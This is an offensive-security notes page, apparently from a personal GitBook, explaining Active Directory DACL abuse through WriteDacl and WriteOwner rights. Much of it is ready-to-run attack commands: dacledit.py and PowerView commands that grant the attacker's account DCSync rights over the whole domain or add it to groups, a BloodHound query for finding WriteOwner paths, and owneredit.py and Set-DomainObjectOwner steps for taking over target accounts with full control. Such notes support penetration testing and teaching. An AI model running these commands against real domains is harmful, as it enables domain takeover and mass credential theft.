🦦
Otter's Notes
  • Introduction
  • Articles
    • Dumping data from the Microsoft Recall folder
    • Gaining persistence on Windows with Time Providers
    • Reverse engineering LSASS to decrypt DPAPI keys
    • Intro to Hypervisor Implants
    • In-depth Windows Telemetry
  • Notes
    • Active Directory
      • Active Directory Structure
      • Active Directory Terminology
      • Active Directory Objects
      • Active Directory Groups
      • Active Directory Functionality
      • Active Directory Protocols
      • Active Directory Rights and Privileges
      • Security in Active Directory
      • Users and Machine Accounts
      • NTLM
      • LDAP
      • Making a Target User List
      • Enumerating & Retrieving Password Policies
      • Enumerating Security Controls
      • Examining Group Policy
      • GPOs
      • LAPS
      • LLMNR & NBT-NS Poisoning
      • LOLBIN Enumeration
    • AAD
      • Useful Links
      • Overview of Azure & M365
      • Enumerate Users and Domains
      • Post-exploitation Reconnaissance
      • OAuth 2.0 Abuse
      • Abusing Device Code Authentication
      • Abusing Cloud Administrator Role
      • Abusing User Administrator Role
      • AAD Federated Backdoor
      • Service Principal Abuse
      • Compromising Azure Blobs and Storage Accounts
      • Malicious Device Join
      • Disabling Auditing (Unified Audit Logs)
      • Spoofing Azure Sign-In Logs
      • Registering Fake Agents for Log Spoofing
      • Pass the PRT
      • Pass the Cookie
      • Abusing Managed Identities
      • Virtual Machine Abuse
      • Attacking Key Vaults
    • Forest Trust Abuse
      • Parent-Child Trust Abuse
      • One-Way Inbound Trust Abuse
      • Foreign Group Membership
      • Foreign ACL Principals
      • SID History
      • SID Filter Bypass
      • Intra-Forest Attacks
        • Configuration Naming Context Replication
        • ADCS NC Replication Attack
        • GPO On-Site Attack
        • GoldenGMSA Attack
        • DNS Trust Attack
      • Cross-Forest Attacks
        • Trust Account Attack
        • Abusing SQL Linked Servers
        • Abusing PAM Trusts
    • Kerberos
      • Overview of Kerberos Authentication
      • Silver Tickets
      • Golden Tickets
      • Diamond Tickets
      • Kerberoasting
      • AS-REPRoasting
      • Resource-Based Constrained Delegation
      • Constrained Delegation
      • Unconstrained Delegation
      • S4U2Self & S4U2Proxy
      • Golden Certificates
    • DACL Abuse
      • DACL Overview
      • DACLs Enumeration
      • AddMembers
      • GPO Attacks
      • Granting Rights and Ownership
      • Logon Scripts
      • NoPAC
      • Password Abuse
      • SPN Jacking
      • Shadow Credentials
      • Targeted Kerberoasting
    • ADCS
      • Introduction to ADCS
      • ESC1
      • ESC2
      • ESC3
      • ESC4
      • ESC5
      • ESC6
      • ESC7
      • ESC8
      • ESC9
      • ESC10
      • ESC11
      • Certificate Mapping
    • PowerShell
      • PowerShell Basics
      • PowerShell Remoting
      • Alternate PowerShell Hosts
      • PowerShell Pipeline Runners
      • PowerShell Code Signing
      • Scriptblock Logging
      • PowerShell CLM
      • AMSI
      • PowerShell Reflection
      • WMI - Windows Management Instrumentation
      • Interfacing with AD
      • PowerShell Snippets
        • Bypass application whitelisting and CLM with runscripthelper and WMI
        • Create fake PowerShell logs
        • Enumerate AD ACLs
        • Enumerate WMI events
        • Enumerate Domain Trusts
        • Enumerate change metadata
        • Enumerate non-signed service binaries
        • Enumerate with GPOs
        • Find signed alternate PowerShell hosts
        • Get AMSI module
        • Group processes by user with WMI
        • Hide processes from Get-Process
        • Malware re-purposing with PowerShell reflection
        • Monitor PowerShell hosts with WMI
        • PowerShell reflection offensive use-case
        • Query PowerShell alternative hosts with WMI
        • Retrieve file certificate
        • Search LDAP for misconfigurations
        • Sign custom code with PowerShell
        • WMI service creation
        • Weak folder permission enumeration
    • AWS
      • AWS Organizations
      • AWS Principals
    • Binary Exploitation
      • Environment setup for Browser Exploitation
      • Browser Overview and Components
    • Kernel Development
      • Windows
        • Configuring a VM for driver development
Powered by GitBook
On this page
  1. Notes
  2. DACL Abuse

Granting Rights and Ownership

PreviousGPO AttacksNextLogon Scripts

Last updated 9 months ago

Permissions such as WriteDacl and Ownership, play a crucial role in controlling access to objects and ensuring their security. The WriteDacl access right refers to the privilege that allows an account to modify the DACL of a target object. Ownership on the other hand denotes the state of possessing administrative control over an object. Understanding the significance of these access rights is essential as they can impact the vulnerability and potential abuses associated with the manipulated DACL.

If we possess an account with privileges to modify a target object's DACL we can use that account to edit the target's DACL and make it vulnerable to other attacks.

WriteDacl

Once we find an account with WriteDacl or Ownership over another object we can modify the DACLs to, for example, add DCSync permissions towards the entire domain

dacledit.py -principal otter -target-dn dc=domain,dc=com -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights DCSync
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity otter -Rights DCSync -Verbose

Another option would be adding ourselves to a group

dacledit.py -principal otter -target "Vulnerable Group" -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

Now we can add ourselves or another user to a group like we did in the section.

WriteOwner

This DACL allows us to modify the owner of the target object, specifically the OwnerSid sub-attribute within the object's security descriptor.

MATCH p=((n:User)-[r:WriteOwner]->(m)) RETURN p

With this kind of right we can perform a . Specifically, we can abuse WriteOwner by using owneredit

owneredit.py -action write -new-owner otter -target targetUser -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

usually this step is followed by changing the DACL of the new user to something like FullControl

dacledit.py -principal otter -target targetUser -action write -rights FullControl -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

From Windows we can do something similar

Set-DomainObjectOwner -Identity targetUser -OwnerIdentity otter -Verbose
Add-DomainObjectAcl -TargetIdentity targetUser -PrincipalIdentity otter -Rights All -Verbose
AddMembers
GPO attack